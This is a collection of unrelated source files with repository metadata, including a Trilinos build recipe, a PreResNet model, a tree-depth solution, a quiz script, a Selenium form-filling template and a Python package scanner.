if spec.satisfies('%gcc') or spec.satisfies('%clang'):
libgfortran = os.path.dirname(os.popen(
'%s --print-file-name libgfortran.a' %
join_path(mpi_bin, 'mpif90')).read())
options.extend([
'-DTrilinos_EXTRA_LINK_FLAGS:STRING=-L%s/ -lgfortran' % (
libgfortran),
'-DTrilinos_ENABLE_Fortran=ON'
])
# Explicit instantiation
if '+instantiate' in spec:
options.extend([
'-DTrilinos_ENABLE_EXPLICIT_INSTANTIATION:BOOL=ON'
])
if '+tpetra' in spec:
options.extend([
'-DTpetra_INST_DOUBLE:BOOL=ON',
'-DTpetra_INST_INT_LONG:BOOL=ON'
'-DTpetra_INST_COMPLEX_DOUBLE=%s' % (
'ON' if '+instantiate_cmplx' in spec else 'OFF'
)
])
# disable due to compiler / config errors:
if spec.satisfies('%xl') or spec.satisfies('%xl_r'):
options.extend([
'-DTrilinos_ENABLE_Pamgen:BOOL=OFF',
'-DTrilinos_ENABLE_Stokhos:BOOL=OFF'
])
if sys.platform == 'darwin':
options.extend([
'-DTrilinos_ENABLE_FEI=OFF'
])
if sys.platform == 'darwin' and macOS_version() >= Version('10.12'):
# use @rpath on Sierra due to limit of dynamic loader
options.append('-DCMAKE_MACOSX_RPATH=ON')
else:
options.append('-DCMAKE_INSTALL_NAME_DIR:PATH=%s' %
self.prefix.lib)
if spec.satisfies('%intel') and spec.satisfies('@12.6.2'):
# Panzer uses some std:chrono that is not recognized by Intel
# Don't know which (maybe all) Trilinos versions this applies to
# Don't know which (maybe all) Intel versions this applies to
options.extend([
'-DTrilinos_ENABLE_Panzer:BOOL=OFF'
])
# collect CXX flags:
options.extend([
'-DCMAKE_CXX_FLAGS:STRING=%s' % (' '.join(cxx_flags)),
])
# disable due to compiler / config errors:
options.extend([
'-DTrilinos_ENABLE_Pike=OFF'
])
return options
@run_after('install')
def filter_python(self):
# When trilinos is built with Python, libpytrilinos is included
# through cmake configure files. Namely, Trilinos_LIBRARIES in
# TrilinosConfig.cmake contains pytrilinos. This leads to a
# run-time error: Symbol not found: _PyBool_Type and prevents
# Trilinos to be used in any C++ code, which links executable
# against the libraries listed in Trilinos_LIBRARIES. See
# https://github.com/Homebrew/homebrew-science/issues/2148#issuecomment-103614509
# A workaround is to remove PyTrilinos from the COMPONENTS_LIST :
if '+python' in self.spec:
filter_file(r'(SET\(COMPONENTS_LIST.*)(PyTrilinos;)(.*)',
(r'\1\3'),
'%s/cmake/Trilinos/TrilinosConfig.cmake' %
self.prefix.lib)
| [
"jon.rood@nrel.gov"
] | jon.rood@nrel.gov |
ce0bb9b7c37fb8d9f44611f1099941fe6efd372c | 4439b04e1fe448b1dffb8239005ca75362926c71 | /models/preresnet.py | 3cbac4fbb217498d61af53aa68c52a579fb229aa | [
"MIT"
] | permissive | yangcyself/SDPoint | 6cd69853fc92989b3f7215a440738f15d44b7618 | f4ae14d6a4126dba96ae5191b1c8f31b5724161a | refs/heads/master | 2020-04-29T03:25:41.066857 | 2019-04-08T10:49:48 | 2019-04-08T10:49:48 | 175,809,324 | 0 | 0 | MIT | 2019-03-15T11:40:07 | 2019-03-15T11:40:06 | null | UTF-8 | Python | false | false | 7,455 | py | import torch.nn as nn
import torch.nn.functional as F
import math
import random
import torch.utils.model_zoo as model_zoo
__all__ = ['PreResNet', 'preresnet18', 'preresnet34', 'preresnet50', 'preresnet101',
'preresnet152', 'preresnet200']
def conv3x3(in_planes, out_planes, stride=1):
    """Return a bias-free 3x3 convolution that preserves spatial size
    when ``stride`` is 1 (padding of one pixel on every border)."""
    return nn.Conv2d(
        in_planes,
        out_planes,
        kernel_size=3,
        stride=stride,
        padding=1,
        bias=False,
    )
class BasicBlock(nn.Module):
    """Pre-activation basic residual block (BN -> ReLU -> 3x3 conv, twice).

    Each instance takes a unique ``blockID`` from the module-level counter
    (the counter is created/reset by ``PreResNet.__init__``) so SDPoint's
    stochastic downsampling can target individual blocks.  When
    ``downsampling_ratio`` is set below 1, the block's output is
    average-pooled down to that fraction of its spatial size.
    """
    expansion = 1

    def __init__(self, inplanes, planes, stride=1, downsample=None):
        super(BasicBlock, self).__init__()
        self.conv1 = conv3x3(inplanes, planes, stride)
        # BUG FIX: this is a *pre-activation* block, so bn1 normalizes the
        # block input, which has `inplanes` channels.  It was
        # nn.BatchNorm2d(planes), which crashed whenever a stage transition
        # made inplanes != planes (e.g. preresnet18/34, first block of
        # layer2..layer4).  Bottleneck already does this correctly.
        self.bn1 = nn.BatchNorm2d(inplanes)
        self.relu = nn.ReLU(inplace=True)
        self.conv2 = conv3x3(planes, planes)
        self.bn2 = nn.BatchNorm2d(planes)
        self.downsample = downsample
        self.stride = stride
        # Claim the next SDPoint block id from the module-wide counter.
        global blockID
        self.blockID = blockID
        blockID += 1
        self.downsampling_ratio = 1.

    def forward(self, x):
        residual = x
        out = self.bn1(x)
        out_ = self.relu(out)  # pre-activation, reused by the downsample path
        out = self.conv1(out_)
        out = self.bn2(out)
        out = self.relu(out)
        out = self.conv2(out)
        if self.downsample is not None:
            # Project the *pre-activated* input to match shape/stride.
            residual = self.downsample(out_)
        out += residual
        if self.downsampling_ratio < 1:
            # SDPoint: shrink the output spatially by the chosen ratio.
            out = F.adaptive_avg_pool2d(out, int(round(out.size(2)*self.downsampling_ratio)))
        return out
class Bottleneck(nn.Module):
    """Pre-activation bottleneck residual block (1x1 -> 3x3 -> 1x1 convs,
    each preceded by BN + ReLU).

    Instances number themselves with the module-level ``blockID`` counter so
    that SDPoint's stochastic downsampling can single out one block; setting
    ``downsampling_ratio`` below 1 average-pools the block output to that
    fraction of its spatial size.
    """
    expansion = 4

    def __init__(self, inplanes, planes, stride=1, downsample=None):
        super(Bottleneck, self).__init__()
        self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
        self.bn1 = nn.BatchNorm2d(inplanes)
        self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
                               padding=1, bias=False)
        self.bn2 = nn.BatchNorm2d(planes)
        self.conv3 = nn.Conv2d(planes, planes * self.expansion, kernel_size=1, bias=False)
        self.bn3 = nn.BatchNorm2d(planes)
        self.relu = nn.ReLU(inplace=True)
        self.downsample = downsample
        self.stride = stride
        # Claim the next SDPoint block id from the module-wide counter.
        global blockID
        self.blockID = blockID
        blockID += 1
        self.downsampling_ratio = 1.

    def forward(self, x):
        shortcut = x
        # First pre-activation; its result also feeds the downsample path.
        preact = self.relu(self.bn1(x))
        y = self.conv1(preact)
        y = self.conv2(self.relu(self.bn2(y)))
        y = self.conv3(self.relu(self.bn3(y)))
        if self.downsample is not None:
            shortcut = self.downsample(preact)
        y += shortcut
        if self.downsampling_ratio < 1:
            # SDPoint: shrink the output spatially by the chosen ratio.
            target = int(round(y.size(2) * self.downsampling_ratio))
            y = F.adaptive_avg_pool2d(y, target)
        return y
class PreResNet(nn.Module):
    """Pre-activation ResNet with SDPoint stochastic downsampling.

    Every residual block (and the stem, which takes the final counter value)
    is numbered via the module-global ``blockID``.  On each forward pass,
    ``stochastic_downsampling`` picks one id plus a pooling ratio, and the
    matching module shrinks its output spatially by that ratio.
    """

    def __init__(self, block, layers, num_classes=1000):
        self.inplanes = 64
        super(PreResNet, self).__init__()
        # Reset the module-wide SDPoint id counter before blocks are built.
        global blockID
        blockID = 0
        self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
                               bias=False)
        self.bn1 = nn.BatchNorm2d(64)
        self.relu = nn.ReLU(inplace=True)
        self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
        self.layer1 = self._make_layer(block, 64, layers[0])
        self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
        self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
        self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
        self.bn2 = nn.BatchNorm2d(512 * block.expansion)
        self.avgpool = nn.AdaptiveAvgPool2d(1)
        self.fc = nn.Linear(512 * block.expansion, num_classes)
        # The stem claims the next id (== number of residual blocks), so the
        # post-stem max-pool itself can act as a downsampling point.
        self.blockID = blockID
        self.downsampling_ratio = 1.
        self.size_after_maxpool = None  # lazily measured on first shrunk pass
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                # He-style init scaled by fan-out.
                n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
                m.weight.data.normal_(0, math.sqrt(2. / n))
            elif isinstance(m, nn.BatchNorm2d):
                m.weight.data.fill_(1)
                m.bias.data.zero_()
            elif isinstance(m, nn.Linear):
                m.bias.data.zero_()  # weight keeps PyTorch's default init

    def _make_layer(self, block, planes, blocks, stride=1):
        """Stack ``blocks`` residual blocks; the first may change stride or
        channel count via a 1x1-conv + BN projection shortcut."""
        downsample = None
        if stride != 1 or self.inplanes != planes * block.expansion:
            downsample = nn.Sequential(
                nn.Conv2d(self.inplanes, planes * block.expansion,
                          kernel_size=1, stride=stride, bias=False),
                nn.BatchNorm2d(planes * block.expansion),
            )
        layers = []
        layers.append(block(self.inplanes, planes, stride, downsample))
        self.inplanes = planes * block.expansion
        for i in range(1, blocks):
            layers.append(block(self.inplanes, planes))
        return nn.Sequential(*layers)

    def stochastic_downsampling(self, blockID, ratio):
        """Select which module (if any) downsamples on this forward pass.

        ``blockID`` None means draw uniformly from [-1, self.blockID], where
        -1 selects no downsampling.  ``ratio`` None means pick 0.5 or 0.75
        at random for the chosen module.
        """
        # BUG FIX: the old ``x and y or z`` one-liners mis-handled falsy
        # values -- a randomly drawn blockID of 0 collapsed to None, so
        # block 0 could never be selected.  Use explicit conditionals.
        if blockID is None:
            block_chosen = random.randint(-1, self.blockID)
        else:
            block_chosen = blockID
        if ratio is None:
            downsampling_ratios = [0.5, 0.75]
        else:
            downsampling_ratios = [ratio, ratio]
        if self.blockID == block_chosen:
            self.downsampling_ratio = downsampling_ratios[random.randint(0, 1)]
        else:
            self.downsampling_ratio = 1.
        # BUG FIX: include BasicBlock as well -- both block types carry
        # blockID / downsampling_ratio, but only Bottleneck instances were
        # being updated, so BasicBlock nets (preresnet18/34) never actually
        # downsampled.
        for m in self.modules():
            if isinstance(m, (BasicBlock, Bottleneck)):
                if m.blockID == block_chosen:
                    m.downsampling_ratio = downsampling_ratios[random.randint(0, 1)]
                else:
                    m.downsampling_ratio = 1.

    def forward(self, x, blockID=None, ratio=None):
        self.stochastic_downsampling(blockID, ratio)
        x = self.conv1(x)
        x = self.bn1(x)
        x = self.relu(x)
        if self.downsampling_ratio < 1:
            # The stem was chosen: replace the fixed max-pool with an
            # adaptive one that shrinks to the requested fraction of the
            # normal post-maxpool size (measured once and cached).
            if self.size_after_maxpool is None:
                self.size_after_maxpool = self.maxpool(x).size(2)
            x = F.adaptive_max_pool2d(x, int(round(self.size_after_maxpool*self.downsampling_ratio)))
        else:
            x = self.maxpool(x)
        x = self.layer1(x)
        x = self.layer2(x)
        x = self.layer3(x)
        x = self.layer4(x)
        x = self.bn2(x)
        x = self.relu(x)
        x = self.avgpool(x)
        x = x.view(x.size(0), -1)
        x = self.fc(x)
        return x
def preresnet18(pretrained=False, **kwargs):
    """Constructs a PreResNet-18 model.

    ``pretrained`` is accepted for torchvision-style API compatibility but
    is currently ignored (no weights are loaded).
    """
    return PreResNet(BasicBlock, [2, 2, 2, 2], **kwargs)
def preresnet34(pretrained=False, **kwargs):
    """Constructs a PreResNet-34 model.

    ``pretrained`` is accepted for torchvision-style API compatibility but
    is currently ignored (no weights are loaded).
    """
    return PreResNet(BasicBlock, [3, 4, 6, 3], **kwargs)
def preresnet50(pretrained=False, **kwargs):
    """Constructs a PreResNet-50 model.

    ``pretrained`` is accepted for torchvision-style API compatibility but
    is currently ignored (no weights are loaded).
    """
    return PreResNet(Bottleneck, [3, 4, 6, 3], **kwargs)
def preresnet101(pretrained=False, **kwargs):
    """Constructs a PreResNet-101 model.

    ``pretrained`` is accepted for torchvision-style API compatibility but
    is currently ignored (no weights are loaded).
    """
    return PreResNet(Bottleneck, [3, 4, 23, 3], **kwargs)
def preresnet152(pretrained=False, **kwargs):
    """Constructs a PreResNet-152 model.

    ``pretrained`` is accepted for torchvision-style API compatibility but
    is currently ignored (no weights are loaded).
    """
    return PreResNet(Bottleneck, [3, 8, 36, 3], **kwargs)
def preresnet200(pretrained=False, **kwargs):
    """Constructs a PreResNet-200 model.

    ``pretrained`` is accepted for API parity but is currently ignored
    (no weights are loaded).
    """
    model = PreResNet(Bottleneck, [3, 24, 36, 3], **kwargs)
return model | [
"jason7fd@gmail.com"
] | jason7fd@gmail.com |
c653ef0b248892879977259685362bf27d177e0a | 6e62c6e531b307c7797cf8320920353f2ee5cd0c | /104-Maximum-Depth-of-Binary-Tree.py | 94e4f42d0df6f7f5c2a6148eca22beb054950c7b | [] | no_license | OhMesch/Algorithm-Problems | 1d7dbce7f3dda40ff1ec3e7851fb9ceb9b94d791 | 61933e7c0b8d8ffef9bd9a4af4fddfdb77568b62 | refs/heads/master | 2022-10-02T23:51:08.303274 | 2022-08-22T22:12:00 | 2022-08-22T22:12:00 | 93,125,900 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,406 | py | # Problem: Given a binary tree
# Return: The maximum depth of the binary tree
# Definition for a binary tree node.
class TreeNode(object):
    """A binary-tree node: a value plus optional left/right child links."""

    def __init__(self, x):
        self.val = x
        self.right = None
        self.left = None
class Solution(object):
    def maxDepth(self, root):
        """Return the maximum depth of the binary tree rooted at *root*.

        :type root: TreeNode
        :rtype: int
        """
        # Depth of an empty tree is 0; otherwise one more than the deeper
        # of the two subtrees.  (Replaces the old list-accumulator scheme.)
        if root is None:
            return 0
        return 1 + max(self.maxDepth(root.left), self.maxDepth(root.right))

    def helper(self, root, depth, depthArr):
        """Record the running maximum depth of the subtree at *root* in
        ``depthArr`` (its last element is always the max seen so far).

        Kept for backward compatibility; ``maxDepth`` no longer needs it.

        :type root: TreeNode
        :type depth: int
        :type depthArr: list[int]
        :rtype: None  (was misdocumented as int -- it only mutates depthArr)
        """
        if depth > depthArr[-1]:
            depthArr.append(depth)
        if root.left:
            self.helper(root.left, depth + 1, depthArr)
        if root.right:
            self.helper(root.right, depth + 1, depthArr)
# -----------------------------------------------------------------------
# Ad-hoc smoke test: build three small trees and print their depths.
driver = Solution()
# t1: root with two children and one grandchild -> depth 3
t1 = TreeNode(1)
t1.right = TreeNode(2)
t1.left = TreeNode(3)
t1.left.left = TreeNode(5)
# t2: root with two children and a grandchild on each side -> depth 3
t2 = TreeNode(2)
t2.left = TreeNode(1)
t2.right = TreeNode(3)
t2.left.right = TreeNode(4)
t2.right.left = TreeNode(7)
# t3: complete binary tree of 7 nodes -> depth 3
t3 = TreeNode(1)
t3.left = TreeNode(2)
t3.right = TreeNode(3)
t3.left.left = TreeNode(4)
t3.left.right = TreeNode(5)
t3.right.left = TreeNode(6)
t3.right.right = TreeNode(7)
print(driver.maxDepth(t1))  # expected: 3
print(driver.maxDepth(t2))  # expected: 3
print(driver.maxDepth(t3)) | [
"mze5111@gmail.com"
] | mze5111@gmail.com |
585d7ba4e786f38d383aff0c3988d0d78c3af34d | 01759486a230eeb74022fc83495bb14876f72a7a | /create_label_map.py | 7ea3e27f58a4b9871fe57a569b2014ba86577ee2 | [
"Apache-2.0"
] | permissive | jwlw2022/2019_intern_project | eeac05a1e1271c1da8cfdac10075a723ff347f80 | 8c146815d4288882f41ac3ad85ba7f5da252abec | refs/heads/master | 2021-06-13T14:49:34.014300 | 2021-05-20T13:04:11 | 2021-05-20T13:04:11 | 189,961,810 | 1 | 0 | Apache-2.0 | 2019-06-13T01:53:30 | 2019-06-03T08:05:28 | Python | UTF-8 | Python | false | false | 1,133 | py | # Copyright 2019 VIA Technologies, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import sys
import scipy.io as sio
if (len(sys.argv) < 2):
print('Missing argument: path to cars_annos.mat file')
sys.exit(1)
annotation_file = sys.argv[1]
mat = sio.loadmat(annotation_file)
with open('stanford_cars_label_map.pbtxt','w') as output:
for i, vehicle_class in enumerate(mat['class_names'][0]):
print(i+1, str(vehicle_class[0]))
output.write('item {{\n id: {}\n name: \'{}\'\n}}\n\n'.format(i+1, vehicle_class[0]))
| [
"noreply@github.com"
] | noreply@github.com |
ce29bf58af3e5eb3a1d8b346179897b9a2365c95 | 6370e1cea61ab3de3c5451d45e10820b2b382dfe | /settings.py | bc8d2aaeb5ba237c2c831a9ec71f5d383a6f5dc9 | [] | no_license | Maxibond/selenium_work | fd493dc318924cf2978ed18d59613f1e1b15c811 | ae766b227add7033be83fd84ccca2a07b6c5ae2c | refs/heads/master | 2020-01-23T21:09:56.495237 | 2016-12-18T19:03:34 | 2016-12-18T19:03:34 | 74,573,748 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 84 | py | LOGIN = 'ValidLogin'
PASSWORD = 'ValidPassword'
MAIN_URL = 'http://www.reddit.com/'
| [
"jeymontor@yandex.ru"
] | jeymontor@yandex.ru |
b784cb302379736956e6936d0636e72dbf650465 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02399/s627926226.py | 2a4ef109e41aa4a7c46ff6352b1a640bb190278c | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 127 | py |
1
2
3
4
5
6
a, b = [int(i) for i in input().split()]
d = a // b
r = a % b
f = a / b
print('{0} {1} {2:.5f}'.format(d, r, f)) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
5edcc07e987188f0acb6a688fe71c980a95958cb | 3da8e3ca17c2da404aa7c148f4e47686a2bd450b | /app.py | 69cdf11a2d3dd7a1dd974b01082ae8784abb3ea6 | [] | no_license | cjbaccus/UdaciDockerProj | d1b4c4664e44370995f42f8db7fcf89f6942a03d | 62e3e5d05522ec031739f8406e7d98c2571badf0 | refs/heads/main | 2023-07-12T05:56:34.245193 | 2021-08-17T18:53:25 | 2021-08-17T18:53:25 | 397,211,647 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 127 | py | ips = ["{}.{}.{}.{}".format(i,i,i,i) for i in range(1,10)]
for n in ips:
print("THis is the IP address:{}".format(n))
| [
"cjbaccus@gmail.com"
] | cjbaccus@gmail.com |
d804293a9bb22f13def744ccad3cf0bcce62647f | 0fa7b9328e04d2ff5a2b607d9ec6962b7ee97532 | /vi_lib/lib/torchutils/test/test_models.py | afef409c72474e1be1ac61ba78474b7a8a8e86e3 | [] | no_license | aaronpmishkin/normalizing_flows | 4b12bcbe85f400bb27d21e93d8a3c35d9e5df90c | 249f0d99fee6d07783a2a3a595cfeb439af8c599 | refs/heads/master | 2020-04-09T01:09:40.906963 | 2018-12-14T07:47:08 | 2018-12-14T07:47:08 | 159,893,931 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,472 | py | import unittest
import torch
import torchutils.models as models
from torchutils.params import bp2v
from torch.nn.utils import vector_to_parameters as v2p
from torch.nn.utils import parameters_to_vector as p2v
class MLPTestCase(unittest.TestCase):
def assertAllClose(self, a, b):
self.assertTrue(torch.allclose(a, b, 0.01))
def get_dummy_inputs(self, n, indim, hiddim, outdim, s):
torch.manual_seed(0)
mlp = models.MLP(indim, hiddim, outdim)
x = torch.rand(n, indim)
noise = torch.randn(s, models.num_params(mlp))
return mlp, x, noise
def test_num_params(self):
self.assertEqual(models.num_params(models.MLP(10,[],1)), (10+1))
self.assertEqual(models.num_params(models.MLP(10,[1],1)), (10+1) + (1+1))
self.assertEqual(models.num_params(models.MLP(10,[2],1)), (10+1)*2 + (2+1))
def test_interface_forward(self):
mlp, x, _, = self.get_dummy_inputs(7, 5, [], 1, 3)
y = mlp(x)
self.assertTrue(y.shape[0] == x.shape[0])
self.assertTrue(y.shape[1] == 1)
def test_interface_forward_with_noise(self):
n, s = 7, 3
mlp, x, noise = self.get_dummy_inputs(n, 5, [], 1, s)
print(list(mlp.parameters()))
y = mlp(x, noise)
self.assertTrue(list(y.shape) == [s, n, 1])
mlp, x, noise = self.get_dummy_inputs(n, 5, [11], 1, s)
y = mlp(x, noise)
self.assertTrue(list(y.shape) == [s, n, 1])
def test_backward_with_noise(self):
n, s = 7, 3
def manual_gradient(mlp, x, noise):
mu = p2v(mlp.parameters())
gs = []
for sid in range(s):
v2p((noise[sid,:] + mu).contiguous(), mlp.parameters())
g = torch.autograd.grad(torch.sum(mlp(x)), mlp.parameters())
print([gg.shape for gg in g])
gs.append(bp2v(g, 0))
v2p(mu, mlp.parameters())
return sum(gs)
mlp, x, noise = self.get_dummy_inputs(n, 5, [], 1, s)
grad1 = p2v(torch.autograd.grad(torch.sum(mlp(x, noise)), mlp.parameters()))
grad2 = manual_gradient(mlp, x, noise)
self.assertAllClose(grad1, grad2)
mlp, x, noise = self.get_dummy_inputs(n, 5, [11], 1, s)
grad1 = p2v(torch.autograd.grad(torch.sum(mlp(x, noise)), mlp.parameters()))
grad2 = manual_gradient(mlp, x, noise)
self.assertAllClose(grad1, grad2)
| [
"aaronpmishkin@gmail.com"
] | aaronpmishkin@gmail.com |
05a8191a0221fcf44c3631cb1ae3b634e90a6c50 | 52b5773617a1b972a905de4d692540d26ff74926 | /.history/fractions_20200802103056.py | a8e741def594e4049345cfbf9c195c01f24b8d0d | [] | no_license | MaryanneNjeri/pythonModules | 56f54bf098ae58ea069bf33f11ae94fa8eedcabc | f4e56b1e4dda2349267af634a46f6b9df6686020 | refs/heads/master | 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 798 | py | def fractions(numerator,denominator):
if denominator == 0 :
return str(numerator)
number = numerator / denominator
if numerator % denominator == 0:
return str(numerator // denominator)
newStr = str(number)
print(newStr)
largeStr = newStr.split(".")
if len(largeStr[1]) > 1:
return largeStr[0] + "." + '(' + largeStr[1][0] + ')'
return newStr
def frac(numerator,denominator):
res = ""
# create a map to store already seen remainders
# remainder is used as key and its position in result is stored as value
# position for cases like 1/6
mp = {}
# find the first remainder
rem = numerator / denominator
print(rem)
# keep finding the remainder until the
print(frac(-4,333)) | [
"mary.jereh@gmail.com"
] | mary.jereh@gmail.com |
d8d24f01e219adb70d6b6d395b2bf63ff36bd787 | 6668026dd24df7a0232902533877603c52db0f80 | /basic_bot/bot.py | 3f5104cc546c43f17e7a82e3f1df5663c030f782 | [] | no_license | awadahmed97/Basic_bot | 9e0dba170bc323a58e67b3d12a95db1d7c435212 | 5cf6a3549e5c348b9b4db97a54aea12719f1144b | refs/heads/master | 2020-12-13T15:18:52.429861 | 2020-02-03T18:34:40 | 2020-02-03T18:34:40 | 234,455,674 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,716 | py | from config import keys
from selenium import webdriver
def order(k):
driver = webdriver.Chrome('./chromedriver')
#enters the site url (key in config file must be filled)
driver.get(k['site_url'])
#For click methods inspect element in chrome
#and copy xpath of the tags you want to click
#(Right click on link or button, then inspect element to see html code
#and go to the tag you want to copy and go to copy xpath)
#EXAMPLES
#driver.find_element_by_xpath('//*[@id="submit"]').click()
#driver.find_element_by_xpath('/html/body/div[1]/div/div/ul/li[1]/a"]').click()
#driver.find_element_by_xpath('').click()
#driver.find_element_by_xpath('').click()
#send keys method will need two inputs
#the first is the the xpath the same for the click method
#the second is the config files keys that you want to use
#remember ('') for xpath and ("") for keys in your config file
#remember config file must be filled out for keys to be entered
#EXAMPLES
#driver.find_element_by_xpath('//*[@id="emailusername"]').send_keys(k["username"])
#driver.find_element_by_xpath('//*[@id="emailpassword"]').send_keys(k["pass"])
#driver.find_element_by_xpath('').send_keys(k[""])
#driver.find_element_by_xpath('').send_keys(k[""])
#when done filling them out put them in correct order depending on what
#you want to click first or what keys to enter and when
#EXAMPLE
driver.find_element_by_xpath('').send_keys(k[""])
driver.find_element_by_xpath('').send_keys(k[""])
driver.find_element_by_xpath('').click()
driver.find_element_by_xpath('').click()
driver.find_element_by_xpath('').send_keys(k[""])
#increase time if you need more time
time.sleep(500)
if __name__ == '__main__':
order(keys)
| [
"noreply@github.com"
] | noreply@github.com |
df115539ee2bd3c37694d308801d6d8006d23e25 | 6c0861b1b7b4f024c864c3948085e7b16457503d | /Quiz/project3.py | e283758689c7b0fb6c2f8e0a56a27b5e29afeff0 | [] | no_license | NasirOrosco/Python | d228cbfe1f6e8f70402ff0e0f54f03fbc30783ec | 7d2288b6e7e34c05a5d56603706dad782dba8789 | refs/heads/main | 2023-07-10T05:29:06.654206 | 2021-08-04T03:48:30 | 2021-08-04T03:48:30 | 332,862,861 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,024 | py | '''
Created on Jul 1, 2021
The purpose is too create a quiz that tests people's basic highschool knowledge.
@author: Nasir
'''
#Make a variable called score to keep track of the correct answers. And set
#it to 0.
score=0
#Ask the user question one. And store the users answer.
question1=input("What is the powerhouse of the cell? a) mitochondria b) nucleus c) ribosome")
#Check if the answer is correct, if it is add one to score and print out
#"Correct"
#Else, print out "Incorrect, the correct answer is A."
if(question1.lower()=="a"):
score=+1
print("Correct")
else:
print("Incorrect, correct answer is a.")
#Ask the user question two. And store the users answer.
#Check if the answer is correct, if it is add one to score and print out
#"Correct"
#Else, print out "Incorrect, the correct answer is C."
question2=input("2) How many states comprise the United States? a) 13 b) 45 c) 50")
if(question2.lower()=="c"):
score=score+1
print("Correct")
else:
print("Incorrect, answer is c.")
#Ask the user question three. And store the users answer.
#Check if the answer is correct, if it is add one to score and print out
#"Correct"
#Else, print out "Incorrect, the correct answer is A."
question3= input("3) In y = mx + b, what does m stand for? a) slope b) output c) I don't understand math")
if(question3.lower()=="a"):
score= score+1
print("Correct")
else:
print("Incorrect, answer is a.")
#Ask the user question four. And store the users answer.
#Check if the answer is correct, if it is add one to score and print out
#"Correct"
#Else, print out "Incorrect, the correct answer is C."
question4=input("4) In English, a person, place or thing is called? A) verb B) adjective C) noun")
if(question4.lower()=="c"):
score=score+1
print("Correct")
else:
print("Incorrect, answer is c.")
#Calculate the percentage the user got. And store it in a variable called p
p= (int(score)/4)*100
#Print out the users score: "You got a [score]/4. Or a [p]%."
print(f"Yout got a {p}%") | [
"nasirorosco18@gmail.com"
] | nasirorosco18@gmail.com |
00dccca5378c4cc542d8e54c54e252e22ed0e38f | 5d4841bd3160418d3deb88b241edc22c7b7eab18 | /server/serving/package_scanner.py | 10cab85c3a049a56099c34414e74816f80bf0b21 | [] | no_license | cxbn12/ntu-nlp | 2493523bb886facfd661dd4194082ccd653496ae | de98f636919267a3701383636ccb31ccf108f28b | refs/heads/master | 2022-03-16T08:32:24.302783 | 2019-11-04T15:31:56 | 2019-11-04T15:31:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,314 | py | import os.path as osp
import sys
from pathlib import Path
def scan_package(path, base_dir='.'):
"""
Scan for all the python packages under a certain path. Note that this
will automatically append the scan path to the PYTHONPATH. You should be
careful if there is some packages with the same name. In the case of a
name collision, latter scanned packages will not be imported.
Args:
path (str): The path which all the packages under it will be
imported. You should provide the package path rather than the
package name.
base_dir (str, optional): The base directory to be used as a import root.
Assume the project structure is like:
.
├── package1
│ └── foo.py
└── setup.py
Without setting base_dir, which will automatically take your
scan root as the import root.
>>> scan_package('package1')
Which is equivalent to
>>> import foo
If you specify the scan root,
>>> scan_package('package1', 'package1')
this function will use the given root:
>>> import package1.foo
However, you should never let a scan root to be empty if the package
to be scanned is a regular package (with __init__.py inside).
.
├── package2
│ ├── __init__.py
│ └── foo.py
└── setup.py
This will raise a ValueError:
>>> scan_package('package2', 'package2')
Which is equivalent to
>>> import .
Raise:
ValueError:
- path does not exist
- base_dir does not exist
- base_dir is not valid for importing
"""
abs_path = osp.abspath(path)
if not osp.exists(abs_path):
raise ValueError('Parameter `path`: {} not exist'.format(abs_path))
if not osp.exists(base_dir):
raise ValueError('Parameter `base_dir`: {} does not exist'.format(base_dir))
base_dir = osp.abspath(base_dir)
if not abs_path.startswith(base_dir):
raise ValueError('`path`: {} is not a subdirectory of `base_dir`: {}'
.format(abs_path, base_dir))
# mark the base directory as source root
sys.path.insert(0, base_dir)
# scan for all **/*.py file under certain dir
modules = [f for f in Path(abs_path).rglob('*.py') if f.is_file()]
# set **/__init__.py to the package name
modules = [f.parent if f.name == '__init__.py' else f for f in modules]
# import all modules
for module in modules:
module_rel_path = module.relative_to(base_dir)
# check for invalid regular package import
if str(module_rel_path) == '.':
raise ValueError('You may want to import package {} with the scan root as the package, '
', which will cause a importing error. Please try some scan roots outside'
'the package')
else:
module_name = '.'.join(module_rel_path.with_suffix('').parts)
# check if the package has been imported
if module_name not in sys.modules.keys():
__import__(module_name)
| [
"YLI056@e.ntu.edu.sg"
] | YLI056@e.ntu.edu.sg |
